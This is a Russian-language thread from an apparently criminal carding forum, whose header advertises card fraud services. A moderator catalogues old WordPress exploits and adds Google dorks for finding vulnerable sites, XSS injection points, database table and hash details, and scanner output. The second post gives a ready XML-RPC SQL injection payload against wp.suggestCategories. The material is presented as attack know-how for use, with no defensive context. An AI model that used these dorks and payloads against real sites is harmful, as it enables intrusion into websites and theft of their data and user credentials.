Заливы на карты - Платежные системы Обучение заливам на электронные кошельки и карты Карты с балансом - Купить карты с балансом
  1. Уважаемые посетители нашего форума. Ни в коем случае без проверки не проводите сделку с человеком, который предлагает услугу. Или используйте гаранта, либо если мы тему пропустили просите нас проверить его. И не забывайте зарегистрироваться на нашем форуме.
  2. Внимание. У нас изменились ns сервера домена. Некоторое время форум может у кого то не открываться. Все дело времени пока ваш провайдер не обновит свои днс сервера.
    Скрыть объявление

Уязвимость Wordpress

Тема в разделе "Обзор уязвимостей WordPress", создана пользователем Kven, 4 мар 2018.

  1. Автор темы
    Kven
    Offline

    Kven Модератор Команда форума Модератор Участник

    362
    51
    28
    Vulnerabilities:

    Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

    Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

    Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

    1.4*
    Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

    Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

    Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


    1.5.1.*
    Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

    Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

    Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

    WordPress <= 1.5.1.1 SQL Injection Exploit

    WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

    2.0.*
    WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

    Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

    Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

    2.1.*
    Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

    Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

    2.*
    Wordpress <= 2.x dictionnary & Bruteforce attack

    WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

    Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


    dork:
    Code:
    "is proudly powered by WordPress"
    intext:"Warning: main" inurl:Wp ext:php
    inurl:wp-login.php Register Username Password -echo -trac
    inurl:"wp-admin" config -cvs -phpxref
    inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
    Powered by Wordpress 1.2
    intext:"proudly powered by WordPress" filetype:php
    intext:"powered by WordPress" filetype:php -dritte-seite
    intitle:"WordPress > * > Login form" inurl:"wp-login.php"
    ext:php inurl:"wp-login.php" -cvs

    Full path disclosure:

    WordPress < 1.5.2

    Cross-site Scripting:
    /wp-login.php?action=login&redirect_to=[XSS]
    /wp-admin/templates.php?file=[XSS]
    /wp-admin/post.php?content=[XSS]
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    SQL injection examples:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Tables/Prefix_/Columns:
    wp_

    Hash algorithms:
    md5(password)

    WordPress Vulnerability Scanner
    Code:
    $ perl -x wp-scanner.pl Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    WordPress Scanner starting: David Kierznowski (Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!)

    Using plugins dir: wp-content/plugins

    [*] Initial WordPress Enumeration
    [*] Finding WordPress Major Version
    [*] Testing WordPress Template for XSS

    WordPress Basic Results

    wp-commentsrss2.php => Version Leak: WordPress 2.1.3
    wp-links-opml.php => Version Leak: WordPress 2.1.3
    wp-major-ver => Version 2.1
    wp-rdf.php => Version Leak: WordPress 2.1.3
    wp-rss.php => Version Leak: WordPress 2.1.3
    wp-rss2.php => Version Leak: WordPress 2.1.3
    wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
    wp-style-dir => Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    wp-title => Test Blog
    wp-version => WordPress 2.1.3
    x-Pingback => Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    WordPress Plugins Found

    wp-plugins[0] => Akismet
    Download
     
  2. Автор темы
    Kven
    Offline

    Kven Модератор Команда форума Модератор Участник

    362
    51
    28
    Программа: WordPress 2.2, возможно более ранние версии

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
    Вот пример запроса
    HTML:
    <methodCall>
    <methodName>wp.suggestCategories</methodName>
    <params>
    <param><value>1</value></param>
    <param><value>Здесь логин</value></param>
    <param><value>Сдесь пароль</value></param>
    <param><value>1</value></param>
    <param><value>0 UNION SELECT USER()</value></param>
    </params>
    </methodCall>